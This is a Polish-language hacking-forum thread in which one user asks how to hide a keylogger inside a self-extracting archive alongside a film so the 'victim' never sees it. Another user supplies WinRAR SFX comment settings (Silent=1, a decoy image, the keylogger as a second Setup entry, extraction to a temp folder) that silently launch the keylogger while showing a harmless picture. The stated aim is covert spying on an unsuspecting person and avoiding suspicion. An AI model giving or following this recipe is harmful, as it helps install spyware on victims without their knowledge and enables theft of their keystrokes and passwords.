Archiwum SFX

Dirak

Użytkownik
Dołączył
Lipiec 2, 2007
Posty
3
Witam!

Jestem tu nowy. Siedzę od kilku godzin na tym forum i nie udalo mi sie wyszukać odpowiedzi na nurtujące mnie pytanie. Mianowicie, gdy spakuje do archiwum SFX keyloggera i np. film to wypakowują sie one do folderu który podałem, ale gdy ofiara go poprostu wypakuje zamiast otworzyć, cała operacja w du##... , jest również możliwość zabezpieczenia hasłem ale to odpada bo film sie nie odpali, co moze wywołać podejżenia. Chodzi mi o to czy jest możliwość by film był widoczny a keylogger stał się niewidoczny. Chodzi o to że gdy ofiara kliknie na SFX to odpali sie keylogger i zaladuje do jakiegoś odległego folderu, ale gdy wypakuje zobaczy i film i keylogger, a zależy mi żeby tego keyloggera nie zobaczyła nawet podczas wypakowywania. W drugą strone, jeśli plik byłby nieiwdoczny (keylogger) to mógłbym pozwolić sobie na wypakowywanuie go nawet na pulpit, więc podejżenia co do mojej osoby spadają w razie czego do minimum.

Z góry dzięki za odpowiedź.
Dirak.
 

Dirak

Użytkownik
Dołączył
Lipiec 2, 2007
Posty
3
hmmmm

Nie za bardzo rozumiem. Czyli jak mam to zrobic... ? Ustawić żeby wypakowywał się na pulpit ale keylogger odpali sie i usunie w ciągu sekundy tak?? Bo nie za bardzo rozumiem...
Bardziej chodzilo mi o to żeby w archiwym .rar był niewidzialny keylogger który odpali się po odpaleniu właściwego pliku w tym archiwum... Czy jest cos takeigo możeliwe ? Może potrzebuje jakiegos zaawansowanego bindera... Prosze o szybką odpowiedź.

Dirak.
 

EsX

Użytkownik
Dołączył
Czerwiec 21, 2007
Posty
45
zrob tak zaznacz opcje SFX w zakladce Comment wpisz

Silent=1
Setup=nazwa_programu_glownego_ktory_uruchamia_sie_przy_otwarciu.exe
Setup=nazwa_trojana_keyloggera_etc.exe
Path=%tmp%katalog_do_ktorego_sie_rozpakuje

no i jeszcze daj haslo na archiwum i gdy ktos odpali ten plik wpisze haslo automatycznie mu sie samo rozpakuje bez jego wiedzy
;]
 

Dirak

Użytkownik
Dołączył
Lipiec 2, 2007
Posty
3
.....

Dzieki za odpowiedź, ale niestety nie pomogłeś mi. W 1 poście napisałem że moge zrobić zabezpieczenie hasłem jednak jest mi to niepotrzebne. Chodzi mi o możliwość (być może jakiś binder) który stworzy mi archiwum .rar w którym keylogger bedzie niewidoczny a uruchomi się po otworzeniu głównego pliku. Lub też archiwum sfx ale zeby po odpaleniu, wypakowaniu keylogger był np. na pulpicie ale pozostał niewidoczny, oraz żeby był niewidoczny podczas wypakowywania (gdy ofiara zamiats odpalić paczke SFX kliknie na nia PPM i kliknie extract here, zoabzcy keyloggera) i właśnie tego chcę uniknąć.

Proszę o propozycje.
Dirak
 

EsX

Użytkownik
Dołączył
Czerwiec 21, 2007
Posty
45
no to wlasnie ci napisalem moze jeszcze latwiej napisze

Silent=1
Setup=lol.jpg
Setup=keyloggera.exe
Path=%tmp%katalog_do_ktorego_sie_rozpakuje

gdy ktos wlaczy ten plik pokaze mu sie np zdjecie a keylogger sam sie odpali i schowa w katalogu jakim dasz np Path=%tmp%katalog czyli on bedzie

C:Documents and Settingsjakis userkatalog i tak bedzie schowany key
 
Do góry Bottom